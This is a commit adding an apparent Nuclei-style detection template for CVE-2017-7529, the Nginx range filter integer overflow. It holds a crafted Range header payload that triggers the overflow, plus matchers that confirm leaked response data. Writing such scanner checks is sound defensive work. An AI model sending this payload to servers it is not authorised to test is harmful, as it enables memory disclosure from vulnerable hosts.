Added template for CVE-2017-7529

CVE-2017-7529.yaml

@@ -0,0 +1,55 @@
+id: CVE-2017-7529
+
+info:
+ name: Nginx Range Integer Overflow (CVE-2017-7529)
+ author: s1d6p01nt7
+ severity: high
+ description: Checks for an integer overflow vulnerability in the Nginx range filter module which could lead to information disclosure.
+ reference:
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7529
+ - http://seclists.org/fulldisclosure/2021/Sep/36
+ - http://www.securitytracker.com/id/1039238
+ - https://access.redhat.com/errata/RHSA-2017:2538
+ - https://puppet.com/security/cve/cve-2017-7529
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2017-7529
+ cwe-id: CWE-190
+ epss-score: 0.96283
+ epss-percentile: 0.99521
+ cpe: cpe:2.3:a:f5:nginx:*:*:*:*:*:*:*:*
+ metadata:
+ vendor: f5
+ product: nginx
+ shodan-query: cpe:"cpe:2.3:a:f5:nginx"
+ tags: seclists,cve,cve2017,nginx,overflow
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/"
+
+ headers:
+ Range: "bytes=-17208,-9223372036854{{rand_intn(2048)}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Content-Range"
+ part: header
+
+ - type: status
+ status:
+ - 206
+
+ - type: regex
+ regex:
+ - "bytes \\d+-\\d+/(\\d+)"
+
+ part: header
+
+ - type: dsl
+ dsl:
+ - "len(response_body) > 1000"